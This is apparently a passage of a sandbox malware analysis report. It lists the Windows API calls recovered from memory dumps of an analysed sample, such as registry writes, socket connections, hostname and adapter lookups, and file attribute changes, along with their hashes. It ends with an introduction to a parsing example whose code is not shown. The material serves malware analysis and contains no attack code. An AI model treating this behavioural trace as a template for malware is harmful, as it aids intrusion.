                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 84e3592128705565d926a8b4ffecb1d1589000c9b5e0129bbe738630bf2c9bca
                                                                      • Instruction ID: 9a1906aba1a822da6f39976de2b48c73093a6139e22c0fc2916908478c2070c5
                                                                      • Opcode Fuzzy Hash: 84e3592128705565d926a8b4ffecb1d1589000c9b5e0129bbe738630bf2c9bca
                                                                      • Instruction Fuzzy Hash: 28214A714093C46FDB138B259C94662BFB4DF47624F0980DBED858F2A3D2695908D772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05294A00
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 26f85ef36edb735b19aa788f80d08be9edea5e09c370d982f9b6f25d8473d209
                                                                      • Instruction ID: a146c648ec87873f814fd4d76469497a90f9fc32096cbc2437d997fea5c7794f
                                                                      • Opcode Fuzzy Hash: 26f85ef36edb735b19aa788f80d08be9edea5e09c370d982f9b6f25d8473d209
                                                                      • Instruction Fuzzy Hash: D2119D72500600AEEF21DF15DC81F67FBA8FF05710F14856AEE4A9A251D6A1A8098BB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02AFA61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: b90e50b255380aa6792e259d55eb35e0b2cd5d518f9b11132f8956104f0fb29b
                                                                      • Instruction ID: c8c2c683a290735b4695a30fc1f15c63a108fe3b8dc83988fe5b4eb1b026d0e5
                                                                      • Opcode Fuzzy Hash: b90e50b255380aa6792e259d55eb35e0b2cd5d518f9b11132f8956104f0fb29b
                                                                      • Instruction Fuzzy Hash: C511B471409380AFDB228F50DC44B62FFF4EF4A210F0885DAEE898B263C375A418DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0529560D
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: c323d9613edecec26019758d53acd4208c3d14b9bdc029f2d16b61126702c369
                                                                      • Instruction ID: 2f395c81474169d9137f85605837e00a222dc940beff02ff9e4b868cd8be6284
                                                                      • Opcode Fuzzy Hash: c323d9613edecec26019758d53acd4208c3d14b9bdc029f2d16b61126702c369
                                                                      • Instruction Fuzzy Hash: 9411A2755097C09FDB138B25DC41E52BFB4EF06224F0980DFED858F163C2659908CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290091
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: facadf11ecd446872d20e09f7646ad427a0a6ae7f1c972346c8f0d6a52ecc7cb
                                                                      • Instruction ID: 350513fa2709a052134a490d583e20b08386efcf725239617c461c1e527f67c0
                                                                      • Opcode Fuzzy Hash: facadf11ecd446872d20e09f7646ad427a0a6ae7f1c972346c8f0d6a52ecc7cb
                                                                      • Instruction Fuzzy Hash: 4111BF71400204AFEB21CF65DC44F67FFA8EF44720F14846BEE499B251D2B5A4088BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFileAttributesW.KERNEL32(?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294AB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 93a2defd5be6769c1633ace6626f4c708bcc91063bb42f5ea54a1887466178ba
                                                                      • Instruction ID: 9331490ce56c642832df139bdf800ff08eea9575b5ec949b93a91b252efd4281
                                                                      • Opcode Fuzzy Hash: 93a2defd5be6769c1633ace6626f4c708bcc91063bb42f5ea54a1887466178ba
                                                                      • Instruction Fuzzy Hash: 8B1193715083809FDB15CF25DC55B66BFE8EF46220F0884EAED89CB262D274A845CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 05290221
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 770d7d294a69f0b5bf6d30cf52b7abc3e9e29b6277970dbf087d6beb42dad88e
                                                                      • Instruction ID: 7194ab867b6efbf60265417d7b845eedacc9b5d1e4d2eafa10661834e421a579
                                                                      • Opcode Fuzzy Hash: 770d7d294a69f0b5bf6d30cf52b7abc3e9e29b6277970dbf087d6beb42dad88e
                                                                      • Instruction Fuzzy Hash: 1311B671509380AFD311CB15CC45F26FFB8EF86720F19819FED444B692D225B915CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DispatchMessageW.USER32(?), ref: 05295824
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DispatchMessage
                                                                      • String ID:
                                                                      • API String ID: 2061451462-0
                                                                      • Opcode ID: a6a3c3b8441b983110eb3e6da83fa7e6767e0ae622ed58948c2449ce60491b2d
                                                                      • Instruction ID: 1d2a8a4951ddb3f7c5e7ab5034f989f26b5676e8f547a99c7e961f2eff69a028
                                                                      • Opcode Fuzzy Hash: a6a3c3b8441b983110eb3e6da83fa7e6767e0ae622ed58948c2449ce60491b2d
                                                                      • Instruction Fuzzy Hash: 33117C755093C0AFDB138F259C44B62BFB4EF47624F0980DAED898F263D2656848CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052910BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 1cf6195cf1452e317c448334bbc908197e12661c28fd68bba8c7c5a3bde68adb
                                                                      • Instruction ID: 995e93c6dc90c0d7f0b7b7f889fc8c8172fe5539bc332b8be383e0a80a9271a0
                                                                      • Opcode Fuzzy Hash: 1cf6195cf1452e317c448334bbc908197e12661c28fd68bba8c7c5a3bde68adb
                                                                      • Instruction Fuzzy Hash: A311E071400240AFEB20CF25DC81F6BFFA8EF45320F14846BEE499B241C2B5A404CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05295564
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 1d5eecf9bcfdac9b3459873f8a1c7e86c978853c65b979f7a9341a4f804f8dc0
                                                                      • Instruction ID: 2522fddfc42747d6f7a39a587a946f837fa61c43bfdd24fd72e4a1b740dddf4b
                                                                      • Opcode Fuzzy Hash: 1d5eecf9bcfdac9b3459873f8a1c7e86c978853c65b979f7a9341a4f804f8dc0
                                                                      • Instruction Fuzzy Hash: F911C1715093C09FDB178B25DC54A52BFB4EF07220F0880EBED858F263D269A908CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNEL32(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02AFA32C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 8291490de7586f2f774cade983f7dbbeb5b3f110997af33313cb70bfa060a11f
                                                                      • Instruction ID: 530dc2628f7a19cc303704862996561c67bef4135c9ed455967de62e8fb99f94
                                                                      • Opcode Fuzzy Hash: 8291490de7586f2f774cade983f7dbbeb5b3f110997af33313cb70bfa060a11f
                                                                      • Instruction Fuzzy Hash: DE119475509380AFDB12CF25DC94B56BFA8EF46220F0884EBED898F653D2759908CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292F85
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      • String ID:
                                                                      • API String ID: 2506852604-0
                                                                      • Opcode ID: 07984ea7d9af1dcae3686172e08ef254b0fd11723bb8351a1ae272902f516256
                                                                      • Instruction ID: 013cc0fb034639393fb5b8710d2f33a09fbfc05672d8757f351b78a4585f72b2
                                                                      • Opcode Fuzzy Hash: 07984ea7d9af1dcae3686172e08ef254b0fd11723bb8351a1ae272902f516256
                                                                      • Instruction Fuzzy Hash: 7111AC75500604EEEB21CF15DC85F66FFA8EF05720F1485ABEE495B351C2B5A409CBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 052944DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: ff2aa1febc0ada588fabad51d1bde8f47123afd910d604b2b79b0fd0c8b50867
                                                                      • Instruction ID: 2faf46cf09393b4951257c78c4499504a7c056186153d02cf0125f5865efc5a0
                                                                      • Opcode Fuzzy Hash: ff2aa1febc0ada588fabad51d1bde8f47123afd910d604b2b79b0fd0c8b50867
                                                                      • Instruction Fuzzy Hash: F211E175510200AFEB20EB15DC81FA7FF98EF45720F24849AEE496B381D6F5A5098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321719116.0000000002AF2000.00000040.00000001.sdmp, Offset: 02AF2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >r 2
                                                                      • API String ID: 0-999725458
                                                                      • Opcode ID: 6b1924caaa139641a161f6b75a49295ed8e4014fc8affc66e24e7a92b4859f91
                                                                      • Instruction ID: 81e084ef1f90dadf0bc925de1b886cb525896fee3c1a0963cf38a92969e5cdeb
                                                                      • Opcode Fuzzy Hash: 6b1924caaa139641a161f6b75a49295ed8e4014fc8affc66e24e7a92b4859f91
                                                                      • Instruction Fuzzy Hash: C9A1B35190E7C14FD7D34BF24835394BFB29E5720975A64CBEEC08B1A3D96D0806CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529355F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      • String ID:
                                                                      • API String ID: 1402429939-0
                                                                      • Opcode ID: b05279a1ddfcb40b1051bb99f82fd24a66316aefc2687eb431178f45b558504e
                                                                      • Instruction ID: 08c176ccd090093fb0bdf3f9ea0bb264f9e1578da10406a0cbf25133f073466f
                                                                      • Opcode Fuzzy Hash: b05279a1ddfcb40b1051bb99f82fd24a66316aefc2687eb431178f45b558504e
                                                                      • Instruction Fuzzy Hash: A611E171500204AFEB20CB15CC85F66FFA8EF19721F18C86BEE495B341D2B4A408CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293077
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterInfo
                                                                      • String ID:
                                                                      • API String ID: 3405139893-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapViewOfFile.KERNEL32(?,?,?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05291504
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: recv
                                                                      • String ID:
                                                                      • API String ID: 1507349165-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CopyFileW.KERNEL32(?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294F6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,?,?,?), ref: 052928A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFBD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 05292215
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ExtentPoint32Text
                                                                      • String ID:
                                                                      • API String ID: 223599850-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05293E4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Connect
                                                                      • String ID:
                                                                      • API String ID: 3144859779-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFileAttributesW.KERNEL32(?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294AB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?), ref: 02AFAA4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0529146E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 052932CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0529532A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 514040917-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • gethostname.WS2_32(?,00000E2C,?,?), ref: 02AFA1C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: gethostname
                                                                      • String ID:
                                                                      • API String ID: 144339138-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05291AE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02AFA61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 0529215A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 05290221
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 052956C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapViewOfFile.KERNEL32(?,?,?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05291504
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 02AFB802
Memory Dump Source
• Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 7c216d91c6404da9a9a695a098173212b27b0a39eca40d838ebefc457197d22c
• Instruction ID: 017071f5e494b266338e2e363109a6376c56ed4112d265a77c2156affad12dbb
• Opcode Fuzzy Hash: 7c216d91c6404da9a9a695a098173212b27b0a39eca40d838ebefc457197d22c
• Instruction Fuzzy Hash: 54018F72500600ABD210DF16DC82F26FBA8FB88B20F14811AED084B741E371B915CAA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02AFA32C
Memory Dump Source
• Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 29767931a321f386c1de4c720234f7a0f16f4440c016988707604d0c771584f9
• Instruction ID: 5c9e9f1a3642da9a4ac6713567ddfa409b3e6b8cde2ebc86e8ca090cadfcbc19
• Opcode Fuzzy Hash: 29767931a321f386c1de4c720234f7a0f16f4440c016988707604d0c771584f9
• Instruction Fuzzy Hash: 2F01D4759002009FDB50CF69D8847A6FFE4EF40620F18C1ABEE098B212D779A404CB61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 0529560D
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: e811d92adfcb9831f7e627dc7e6a116d2dcc60c6438a1d8ef2a2d49492770d89
• Instruction ID: d9b0c42167d04e3b394701a79766de5404f00d4a5538e754d63e639c55e13008
• Opcode Fuzzy Hash: e811d92adfcb9831f7e627dc7e6a116d2dcc60c6438a1d8ef2a2d49492770d89
• Instruction Fuzzy Hash: 8C01B131610640DFDB25CF15D884B66FFA0EF04320F18C09AED4A4B761C2B1A418CF61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05295564
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 76ca5aadbe860ec246e8256ed655da28e88b568dc61818203d7ab6f7c534e0d7
• Instruction ID: ee88103fed2c6ea4f514019b4d89f9cd61f7e00aa5ade9eb05d441139581ec68
• Opcode Fuzzy Hash: 76ca5aadbe860ec246e8256ed655da28e88b568dc61818203d7ab6f7c534e0d7
• Instruction Fuzzy Hash: FF01AD756106009FDB15CF29D885762FFA5EF04620F18C0ABED4A8B752D2B5E408CA62
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
• Opcode ID: 2fef9698d90824bd471bd6654f895bb7a2dcfdcd7aadabe32784ed254eecb5db
• Instruction ID: ce2de4e3202f9c383131fc295616901f9b55a50b08d8cb621e787f715ab96ddd
• Opcode Fuzzy Hash: 2fef9698d90824bd471bd6654f895bb7a2dcfdcd7aadabe32784ed254eecb5db
• Instruction Fuzzy Hash: BE01A2708002409FDB50CF65D8847A6FFE4EF44320F18C4ABEE498F212D6B9A504CBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,?,?,?), ref: 052928A9
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 7aae75e445bf2f38e0cf661d791ca0df2fc8b4aee685f6a697ee07a63538a24d
• Instruction ID: d0aa24a5ca692690fa10b26e3a38bd1fa766c3f0938a88d1b71a5b124823a24e
• Opcode Fuzzy Hash: 7aae75e445bf2f38e0cf661d791ca0df2fc8b4aee685f6a697ee07a63538a24d
• Instruction Fuzzy Hash: 59017C35810604EFEB20CF55D844B66FFA0FF08320F18849ADE490A616C2B5A458CB72
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetWindowLongW.USER32(?,?,?), ref: 02AFAA4A
Memory Dump Source
• Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: 671d81452509b37225573dc55b6903e68d467a9e6d46c534bc4e4250d843be69
• Instruction ID: ac956790d359cdee7f5459e52b2a966e2981e7d66552afd4006b9e52401a7bbc
• Opcode Fuzzy Hash: 671d81452509b37225573dc55b6903e68d467a9e6d46c534bc4e4250d843be69
• Instruction Fuzzy Hash: 0A018B354007049FDB60DF55D985762FFA0EF04720F18C19AEE490B216C7B9A408CB62
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DispatchMessageW.USER32(?), ref: 05295824
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: e07df880f2255f5111762b0b299ee8bd6edfc0bccfb72c6cd9b8d193e426334d
• Instruction ID: 677e380a4c9ece395b9d5af699df505b37c18f9fdd1ed0809ffeba603c6e1cea
• Opcode Fuzzy Hash: e07df880f2255f5111762b0b299ee8bd6edfc0bccfb72c6cd9b8d193e426334d
• Instruction Fuzzy Hash: C2F0AF34A10644DFDB11CF15D885BA2FFA0FF04720F18C0AADD494B712D6B5A448CFA2
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02AFA6CC
Memory Dump Source
• Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 58ce1ed886ea92d2f5f031128635640cc38c09b2d6bb2fc417d1073e06221e17
• Instruction ID: e6ef592d4f3a9dc0f759488011feaf16b487bd1fa0080b6faa94bd41fddcc249
• Opcode Fuzzy Hash: 58ce1ed886ea92d2f5f031128635640cc38c09b2d6bb2fc417d1073e06221e17
• Instruction Fuzzy Hash: 4AF0AF34900644DFDB90DF55D8857A2FFA4EF04721F18C09AEE494B316D6B9A448CE72
Uniqueness
• Uniqueness Score: -1.00%
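The records above are the per-call-site metadata Joe Sandbox attaches to each function it recovers from a memory dump, and read one at a time they say little. What an analyst wants from them is the view by region: which Win32 imports are called from which dumped block of memory, and whether that block was backed by a PE image on disk. The following is an added example (not part of this report, and not code from the analysed sample) that parses records in exactly this layout and produces that view. Its sample input is constructed from three of the records listed above. The reading of the dotted .sdmp file-name fields as <pid>.<dump>.<sequence>.<base>.<protection>.<type>, with <protection> a Windows PAGE_* constant, is an assumption of the example and is not documented on this page; everything else it uses ("Offset", "based on PE") is stated in the records themselves.

```python
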